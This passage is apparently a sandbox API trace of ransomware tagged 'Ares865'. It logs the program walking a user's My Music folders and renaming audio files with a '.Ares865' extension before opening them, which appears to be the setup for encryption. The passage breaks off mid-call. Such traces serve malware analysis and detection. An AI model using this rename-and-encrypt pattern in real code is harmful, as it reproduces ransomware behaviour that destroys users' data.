Music\\0tvd\\dILY.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\dily.m4a.ares865"), dwFlags=0x1) returned 1 [0094.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\dILY.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\dily.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71993) returned 1 [0094.368] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD" [0094.368] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM" [0094.368] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\2Y2ZlfEaUCpfojS.wav.Ares865") returned 111 [0094.369] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\2Y2ZlfEaUCpfojS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\2y2zlfeaucpfojs.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\2Y2ZlfEaUCpfojS.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\2y2zlfeaucpfojs.wav.ares865"), dwFlags=0x1) returned 1 [0094.369] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\2Y2ZlfEaUCpfojS.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\2y2zlfeaucpfojs.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.370] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58780) returned 1 [0094.373] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\OGKjPxx16qGHocWn.mp3.Ares865") returned 112 [0094.373] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\OGKjPxx16qGHocWn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\ogkjpxx16qghocwn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\OGKjPxx16qGHocWn.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\ogkjpxx16qghocwn.mp3.ares865"), dwFlags=0x1) returned 1 [0094.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\OGKjPxx16qGHocWn.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\ogkjpxx16qghocwn.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.374] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=59656) returned 1 [0094.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\uVasGUJc9g4h1u.m4a.Ares865") returned 110 [0094.380] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\uVasGUJc9g4h1u.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\uvasgujc9g4h1u.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\uVasGUJc9g4h1u.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\uvasgujc9g4h1u.m4a.ares865"), dwFlags=0x1) returned 1 [0094.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\uVasGUJc9g4h1u.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\uvasgujc9g4h1u.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92218) returned 1 [0094.386] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5" [0094.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\-gNFbm.wav.Ares865") returned 114 [0094.386] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\-gNFbm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\-gnfbm.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\-gNFbm.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\-gnfbm.wav.ares865"), dwFlags=0x1) returned 1 [0094.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\-gNFbm.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\-gnfbm.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=54867) returned 1 [0094.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\FvhHKMh6dJ3zo6j.wav.Ares865") returned 123 [0094.391] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\FvhHKMh6dJ3zo6j.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\fvhhkmh6dj3zo6j.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\FvhHKMh6dJ3zo6j.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\fvhhkmh6dj3zo6j.wav.ares865"), dwFlags=0x1) returned 1 [0094.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\FvhHKMh6dJ3zo6j.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\fvhhkmh6dj3zo6j.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44927) returned 1 [0094.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\qJz4u9waQKJsrfja k.m4a.Ares865") returned 126 [0094.396] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\qJz4u9waQKJsrfja k.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qjz4u9waqkjsrfja k.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\qJz4u9waQKJsrfja k.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qjz4u9waqkjsrfja k.m4a.ares865"), dwFlags=0x1) returned 1 [0094.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\qJz4u9waQKJsrfja k.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qjz4u9waqkjsrfja k.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.397] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50912) returned 1 [0094.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\Qmtzhb7hWxBeE32i.mp3.Ares865") returned 124 [0094.401] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\Qmtzhb7hWxBeE32i.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qmtzhb7hwxbee32i.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\Qmtzhb7hWxBeE32i.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qmtzhb7hwxbee32i.mp3.ares865"), dwFlags=0x1) returned 1 [0094.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\Qmtzhb7hWxBeE32i.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\qmtzhb7hwxbee32i.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96227) returned 1 [0094.408] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\rlZ6KG4.wav.Ares865") returned 115 [0094.408] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\rlZ6KG4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\rlz6kg4.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\rlZ6KG4.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\rlz6kg4.wav.ares865"), dwFlags=0x1) returned 1 [0094.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\rlZ6KG4.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\rlz6kg4.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.409] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57603) returned 1 [0094.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\tdAiJOw AOoVDuT.wav.Ares865") returned 123 [0094.413] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\tdAiJOw AOoVDuT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdaijow aoovdut.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\tdAiJOw AOoVDuT.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdaijow aoovdut.wav.ares865"), dwFlags=0x1) returned 1 [0094.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\tdAiJOw AOoVDuT.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdaijow aoovdut.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.414] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30936) returned 1 [0094.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\TdyzKBuIYRkCxyuAKCly.m4a.Ares865") returned 128 [0094.417] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\TdyzKBuIYRkCxyuAKCly.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdyzkbuiyrkcxyuakcly.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\TdyzKBuIYRkCxyuAKCly.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdyzkbuiyrkcxyuakcly.m4a.ares865"), dwFlags=0x1) returned 1 [0094.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\TdyzKBuIYRkCxyuAKCly.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\tdyzkbuiyrkcxyuakcly.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28147) returned 1 [0094.421] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\X9in4MMwgCPLVrUV1zTJ.mp3.Ares865") returned 128 [0094.421] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\X9in4MMwgCPLVrUV1zTJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\x9in4mmwgcplvruv1ztj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\X9in4MMwgCPLVrUV1zTJ.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\x9in4mmwgcplvruv1ztj.mp3.ares865"), dwFlags=0x1) returned 1 [0094.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5\\X9in4MMwgCPLVrUV1zTJ.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\yih8e_hxymp-hd\\nzm-nue9glm\\0nc7 rnzkx5\\x9in4mmwgcplvruv1ztj.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67574) returned 1 [0094.426] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ" [0094.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\7bqdtgnB7uxBKT-.m4a.Ares865") returned 89 [0094.427] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\7bqdtgnB7uxBKT-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\7bqdtgnb7uxbkt-.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\7bqdtgnB7uxBKT-.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\7bqdtgnb7uxbkt-.m4a.ares865"), dwFlags=0x1) returned 1 [0094.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\7bqdtgnB7uxBKT-.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\7bqdtgnb7uxbkt-.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.428] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14294) returned 1 [0094.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\JnPaav8Yr-Hc.mp3.Ares865") returned 86 [0094.430] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\JnPaav8Yr-Hc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\jnpaav8yr-hc.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\JnPaav8Yr-Hc.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\jnpaav8yr-hc.mp3.ares865"), dwFlags=0x1) returned 1 [0094.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\JnPaav8Yr-Hc.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\jnpaav8yr-hc.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91481) returned 1 [0094.446] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\UvBHpG6_Q5Nat0RaDS0.m4a.Ares865") returned 93 [0094.446] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\UvBHpG6_Q5Nat0RaDS0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\uvbhpg6_q5nat0rads0.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\UvBHpG6_Q5Nat0RaDS0.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\uvbhpg6_q5nat0rads0.m4a.ares865"), dwFlags=0x1) returned 1 [0094.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\EaPJ\\UvBHpG6_Q5Nat0RaDS0.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\eapj\\uvbhpg6_q5nat0rads0.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19874) returned 1 [0094.450] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq", iMaxLength=260 | out: 